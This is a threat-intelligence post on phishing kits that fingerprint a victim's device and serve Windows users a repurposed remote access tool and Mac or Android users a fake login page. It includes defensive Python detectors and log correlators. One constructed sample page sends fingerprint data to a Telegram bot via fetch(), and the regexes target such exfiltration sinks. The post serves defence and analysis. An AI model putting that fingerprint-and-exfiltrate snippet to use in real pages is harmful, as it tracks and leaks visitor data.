By: Max Gannon, Cofense Intelligence
Cofense Intelligence is observing a clear shift in phishing operations: threat actors are moving beyond broad, one-size-fits-all campaigns and adopting platform-aware delivery that adapts to the victim’s device, browser, and environment. What began as simple Windows-focused malware distribution campaigns has evolved into more sophisticated campaigns that can selectively deliver credential phishing, remote access tools, or malware across Windows, MacOS, and Android. This trend reflects a broader strategic change in the threat landscape, one that is designed to increase the likelihood of compromise, expand target coverage, and improve threat actor return on investment.
Traditional Phishing Campaigns
Traditional phishing campaigns delivered malware using simple emails, often with inconsistent narratives (Figure 1) or with basic infection chains (Figure 2). These campaigns used attached archives containing malicious scripts that bypassed secure email gateways (SEGs). These campaigns were simplistic but still effective. Due to general improvements in SEGs and email-based security defenses, as well as an increased incorporation of well-trained AI into said defenses, traditional phishing campaigns using malicious attachments appear in inboxes significantly less often than in the past.
Figure 1: An email from a traditional phishing campaign with an attached archive containing a script that runs malware. This corresponds to Active Threat Report (ATR) 389255.

Figure 2: A very simplistic infection chain leading to the execution of Ave_Maria Stealer.
These simplistic, traditional phishing campaigns are detailed in an exhaustive number of Active Threat Reports published by Cofense Intelligence over the years. Active Threat Reports contain all the elements of a phishing campaign, from individual file hashes and network indicators of compromise (IOCs) to all involved subjects and general themes of the email, providing context-rich reports on full campaigns.
Modern Phishing Campaigns
Modern phishing campaigns use emails with targeted themes and narratives relevant to the recipient that provide believable reasons to click embedded links (Figure 3) with complex, multi-stage infection chains (Figure 4).
Figure 3: An email from a modern phishing campaign targeting a victim belonging to a veterinary company. The email contains an embedded URL leading to a phishing site that detects the operating system of the victim. This corresponds to ATR 411478.

Figure 4: A more complex infection chain starting with the email in Figure 3, involving two steps of fingerprinting that lead to either credential phishing or Ninite Loader. Ninite Loader then delivers ConnectWise RAT depending on the local environment.
Multi-Platform Delivery
Threat actors delivering modern campaigns are using browser and operating system information to deliver increasingly targeted content. This information is collected from the “User-Agent” provided by the browser when victims visit a landing page via a URL embedded in an email or attachment. Additional information, such as the victim’s email address, may sometimes be included in the embedded URL. The threat actors use multiple different methods to fingerprint and uniquely identify victim computers before delivering targeted content. Sometimes this fingerprinting is used only to tailor the delivered content, but threat actors are increasingly using tools like Telegram to exfiltrate and store the information as well.
Platform Determination Methods
Although threat actors can use many different methods to determine the operating system and browser of the user, from Cloudflare tools to a multitude of open-source fingerprinting projects, the most common method is a script built into the kit used by the threat actor. There are a large number of different multi-platform kits used, but the majority of them use the same, or very similar, methods.
The most commonly detected and logged components are:
- Browser type
- Operating system/device type
- Language
- Victim local time and local time zone
- Screen and window size
- Geolocation
Some of the basic information collected is shown in Figure 5.

Figure 5: Basic information collected by one of the many open-source multi-platform kits; excessive documentation ensures that even minimally skilled threat actors can take advantage of these tools.
One method of detection that is appearing more often is the use of Cloudflare User-Agent blocking which redirects traffic based on the perceived operating system of the browser before the victim even visits the malicious page. This enables threat actors to deliver customized payloads without having to add their own detection scripts.
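As an added example (not Cofense code, and not code from any kit), the following Python triage helper checks a captured landing page for the fingerprint components listed above, a Telegram exfiltration sink, and an OS-conditional redirect. The sample page is constructed and inert (placeholder token and chat id), and the API patterns are the author's assumptions about what such scripts typically read.

```python
"""Triage a captured landing page for the fingerprint components listed above,
a Telegram exfiltration sink, and an OS-conditional redirect.
Added example, not Cofense or kit code; the sample page is constructed and inert."""
import re

# Each listed component mapped to the browser APIs a kit script reads for it (assumed patterns).
COMPONENT_PATTERNS = {
    "browser_os": r"navigator\.(userAgent|platform|userAgentData)",
    "language": r"navigator\.(language|languages)\b",
    "local_time": r"getTimezoneOffset\(|resolvedOptions\(\)\.timeZone",
    "screen_size": r"\bscreen\.(width|height)|window\.(inner|outer)(Width|Height)",
    "geolocation": r"navigator\.geolocation|ip-api\.com|ipinfo\.io",
}
# Exfiltration sink and the branch that picks a payload per platform.
EXFIL_RE = re.compile(r"api\.telegram\.org/bot[^/\s]+/sendMessage")
BRANCH_RE = re.compile(r"/(Windows|Macintosh|Android|iPhone)/i?\.test\(|indexOf\(.(Win|Mac|Android|iPhone)")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)

def triage_landing_page(html):
    """Return which fingerprint components, sink and branching the page's
    inline scripts contain, plus a verdict an analyst can act on."""
    scripts = "\n".join(SCRIPT_RE.findall(html))
    components = sorted(n for n, p in COMPONENT_PATTERNS.items() if re.search(p, scripts))
    branching = BRANCH_RE.search(scripts) is not None
    report = {
        "components": components,
        "telegram_exfil": EXFIL_RE.search(scripts) is not None,
        "platform_branching": branching,
    }
    # Two or more collected components plus an OS branch is the kit signature;
    # a lone navigator.language read is ordinary localisation code.
    report["verdict"] = "multi-platform kit" if branching and len(components) >= 2 else "inconclusive"
    return report

# Constructed, inert sample page: placeholders instead of a real bot token and chat id.
SAMPLE_PAGE = """<html><body><h1>Document review</h1><script>
var ua = navigator.userAgent, lang = navigator.language;
var tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
var scr = screen.width + "x" + screen.height;
fetch("https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=<ID>&text=" +
      encodeURIComponent([ua, lang, tz, scr].join("|")));
if (/Windows/.test(ua)) { location.href = "/download"; } else { location.href = "/login"; }
</script></body></html>"""
```

Only inline scripts are examined; externally loaded fingerprinting libraries would need to be fetched and concatenated first.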
Malware Delivery Kits
There are a host of multi-platform kits used by threat actors to deliver malware and credential phishing. Some of the kits that are the most convincing and have had the most effort put into them can be seen in Figures 6 and 7. The most commonly spoofed brands by these campaigns are:
- Docusign
- Microsoft Teams
- Adobe
- Zoom
Figure 7: The landing page seen in ATR 41211, which delivers Itarian RAT to Windows-based browsers and is designed to deliver relevant payloads for other operating systems. Itarian RAT then further fingerprints the victim’s machine and potentially delivers ConnectWise RAT.
The majority of the “malware” delivered in these multi-platform campaigns is, in fact, technically legitimate remote access tools (RATs) that have been repurposed to act as remote access trojans (also abbreviated RATs). Threat actors are increasingly favoring these technically legitimate RATs because they are much harder for automated defenses to detect, and some IT teams even use the same RATs as threat actors, making distinguishing legitimate traffic from malicious traffic almost impossible.
Credential Phishing Kits
The credential phishing pages that the multi-platform campaigns redirect to are often simpler than the malware delivery pages and use a similar layout to each other, albeit with different logos. This is notable as many modern credential phishing campaigns simply ask for any email address and password without regard to the service. Two of the most commonly seen credential phishing pages can be seen in Figures 8 and 9.
Figure 8: The landing page for ATR 413611, which delivered ConnectWise RAT for Windows-based operating systems and the shown credential phishing page for MacOS or Android.
Figure 9: The landing page for ATR 411787, which delivered Itarian RAT for Windows-based operating systems and the shown credential phishing page for MacOS or Android.
Motivation of Multi-Platform Targeting
Threat actors are adopting multi-platform targeting for a simple reason: it improves the economics of phishing. By building campaigns that can identify a victim’s device and deliver the most effective payload for that environment, threat actors can reach more targets, increase the likelihood of compromise, and extract more useful information from each interaction. Instead of losing traffic when a victim is on MacOS, Android, or another unsupported platform, threat actors can still monetize the click through credential theft or customized remote access tools. In practice, this means greater profit, broader target coverage, and higher return on investment from the same lure, infrastructure, and campaign effort.
Threat Actor Economics: Maximizing ROI
Multi-platform targeting does more than expand reach; it allows threat actors to extract more value from each campaign. A single lure, landing page, and delivery workflow can be reused across multiple operating systems, reducing infrastructure costs while minimizing wasted clicks from users on unsupported devices. This increases yield from the same social engineering effort, effectively giving threat actors the equivalent of multiple campaigns for the cost of one. When successful access is later monetized through Initial Access Broker (IAB) activity, the result is a longer profit window and substantially stronger return on investment. Groups acting as IABs will typically access victim computers through either stolen credentials or delivered malware, establish persistence, perform reconnaissance on the infected machine and broader network, and sell access to the highest bidder. This is one of the more common ways for enterprises to fall victim to ransomware.
Implications of Multi-Platform Targeting
The shift to multi-platform targeting has two related but distinct consequences for defenders. On the strategic side, long-standing assumptions about which devices are inherently safer can no longer be relied on. On the operational side, the security architectures most organizations have built around those assumptions are poorly suited to detect campaigns that span multiple operating systems. Both gaps stem from the same evolution in threat actor behavior, and together they mean the attack surface is growing while the ability to recognize and correlate intrusions across it is shrinking.
The End of Platform Safety Assumptions
Multi-platform delivery of malware and credential phishing is eroding long-held assumptions that certain operating systems or device types are safer by default. As threat actors build campaigns that can adapt to Windows, MacOS, Android, and other environments, endpoint diversity no longer reduces exposure; it increases it. Previously, statements like “we don’t use Windows” or “mobile users are lower risk” were common, if not respected, but that is no longer a meaningful defense when every device can be fingerprinted, targeted, and monetized differently. This is especially important for devices that sit outside standard enterprise protections, where weaker visibility and inconsistent controls can make them attractive paths for compromise.
Why Platform-Centric Security Is Failing
Many enterprises don’t just have tools poorly suited to monitoring multiple operating systems; they may not even have tools for monitoring operating systems that are not widely used across the enterprise. Even when monitoring exists for multiple operating systems, security tooling is generally built around individual operating systems, not the campaigns that move across them. When a threat actor deploys a single phishing kit that delivers three completely different threats all on the same page with the same infrastructure, defenders typically do not see it as one campaign. A Windows-focused endpoint tool may flag the RAT on one machine while the MacOS event goes unlogged, and the mobile credential theft is never attributed, as it is not even on company infrastructure. The threat actor is running one operation. The defenders are looking at three unrelated problems.
This fragmentation creates gaps that are easy to exploit. Security teams using platform-siloed toolsets have difficulty correlating activity across operating environments, so the same threat actor infrastructure can be behind incidents on multiple device types without anyone connecting them. When behavior baselines and alerting thresholds are set independently per OS, a campaign spread across Windows, MacOS, and mobile may not cross the alert threshold on any single platform, even though the overall impact is significant. Attributing activity to a specific user is also harder when monitoring pipelines for different platforms do not share session or identity data. The end result is that platform-centric security consistently underreports the actual scope of these campaigns, leaving organizations with an incomplete picture of what is already in their environment.
Summary
Threat actors used to send the same malicious email to everyone and hope that one of the hundreds of recipients clicked the embedded link. That approach is fading. Cofense Intelligence is now observing campaigns where threat actors first identify what kind of device the target is using (Windows, MacOS, iPhone, Android, etc.) and then deliver an attack tailored specifically to that device, all from the same email. A Windows employee might receive a RAT that gives a threat actor remote control of their machine, while a colleague who opens the same link on a Mac or phone gets a convincing fake login page instead. The threat actor profits either way.
This matters to organizations because the tools most enterprises rely on were not built for this model. Endpoint security on a Windows machine does not see what happened on a Mac. The mobile device management platform does not talk to the network monitoring tool. When a threat actor runs one campaign across three device types, defenders often see three unrelated, low-priority alerts instead of one coordinated intrusion. The attack looks small. It is not.
A further complication is that the tools threat actors use to gain access are often the same tools legitimate IT departments use every day. Remote access software like ConnectWise is a recognized, trusted application. When a threat actor installs it on a victim’s machine through a phishing campaign, automated defenses frequently allow it to run unchallenged. By the time the intrusion is recognized, the threat actor may have already sold access to that machine or installed additional malware. Access sales of this kind are one of the most common paths to ransomware. The three primary findings from this analysis are:
- Platform-aware attacks are now standard.
- Legitimate tools are high-risk blind spots.
- Detection requires context, not just signatures.
For leadership, the core message is this: the assumption that some employees are safe because they use a Mac, a phone, or a non-Windows device is no longer valid. Every device in the enterprise is a potential entry point, and every click on a phishing link gives a threat actor something to work with regardless of platform. Addressing this requires visibility that crosses device boundaries and intelligence that ties activity across operating systems, with its context, into a single campaign view, rather than treating each platform as its own separate problem.
Mitigation
Defending against multi-platform phishing campaigns means looking past the inbox. Because these campaigns deliver different payloads depending on the victim’s device, blocking the initial email is only part of the picture. Organizations need to understand what happens after an employee clicks: what redirect chains are in use, and what platform-specific delivery logic is embedded in the kit. Making the decision point visible, the point where a Windows victim gets ConnectWise RAT and a MacOS victim gets a credential phishing page, is what makes attribution possible. Mapping threat actor infrastructure across campaigns also helps identify targeting patterns before they reach users, rather than piecing together what happened after a compromise.
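To make that decision point visible, and to counter the per-platform fragmentation described earlier, the following added Python example (not Cofense tooling) groups proxy log lines by landing URL and flags URLs whose next hop differs by client OS family. The log format, hostnames and client addresses are all constructed.

```python
"""Correlate one landing URL across Windows, macOS and Android clients and flag it
when the next hop depends on the client OS family (the campaign's decision point).
Added example, not Cofense tooling; log format, hosts and addresses are constructed."""
import re
from collections import defaultdict

# Constructed proxy log format: time client url status location "user-agent"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) (\S+) "([^"]*)"$')
EXEC_SUFFIXES = (".exe", ".msi", ".dmg", ".pkg", ".apk")

SAMPLE_LOGS = """\
2024-06-01T09:01:02Z 10.1.4.20 https://docs-review.example/view 302 https://cdn.example/support-agent-setup.exe "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36"
2024-06-01T09:03:11Z 10.1.4.35 https://docs-review.example/view 302 https://login-verify.example/ "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 Safari/605.1.15"
2024-06-01T09:05:40Z 10.1.9.7 https://docs-review.example/view 302 https://login-verify.example/ "Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 Chrome/124.0 Mobile Safari/537.36"
2024-06-01T09:07:00Z 10.1.4.21 https://intranet.example/news 200 - "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36"
2024-06-01T09:08:00Z 10.1.4.36 https://intranet.example/news 200 - "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 Safari/605.1.15"
"""

def os_family(user_agent):
    """Coarse classification from the User-Agent, the same signal the kits use.
    Order matters: Android UAs also say 'Linux', iPhone UAs also say 'Mac OS X'."""
    ua = user_agent.lower()
    for needle, family in (("android", "android"), ("iphone", "ios"), ("ipad", "ios"),
                           ("windows", "windows"), ("mac os x", "macos"), ("linux", "linux")):
        if needle in ua:
            return family
    return "unknown"

def outcome(status, location):
    """What the client was handed: the redirect target, or the status if none."""
    return location if status.startswith("3") and location != "-" else f"{status}:direct"

def platform_conditional_urls(log_text):
    """Return {url: {"severity": ..., "by_os": {family: [outcomes]}}} for URLs seen
    from more than one OS family whose outcomes differ between those families."""
    by_url = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the constructed format
        _ts, _client, url, status, location, ua = m.groups()
        by_url[url][os_family(ua)].add(outcome(status, location))
    flagged = {}
    for url, by_os in by_url.items():
        if len(by_os) > 1 and len({frozenset(o) for o in by_os.values()}) > 1:
            hops = {h for hs in by_os.values() for h in hs}
            # A binary download on one branch is the RAT case; a login page alone is credential phishing.
            sev = "high" if any(h.lower().endswith(EXEC_SUFFIXES) for h in hops) else "medium"
            flagged[url] = {"severity": sev, "by_os": {f: sorted(o) for f, o in by_os.items()}}
    return flagged
```

Legitimate sites that send mobile users to a separate mobile subdomain will also be flagged, so feed it only URLs that arrived via email and review the medium-severity hits by hand.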
Automated detection has a specific blind spot against campaigns that repurpose legitimate remote access tools. A signature-based system will not flag ConnectWise RAT or similar tools as malicious because, depending on usage, they are not malicious. What catches them is context: a trained employee who knows that a given organization’s IT department does not use ConnectWise RAT will recognize its unexpected presence, where an automated tool will simply let it pass. Finding and maintaining that kind of human-vetted, contextual intelligence is essential for defending against this threat class.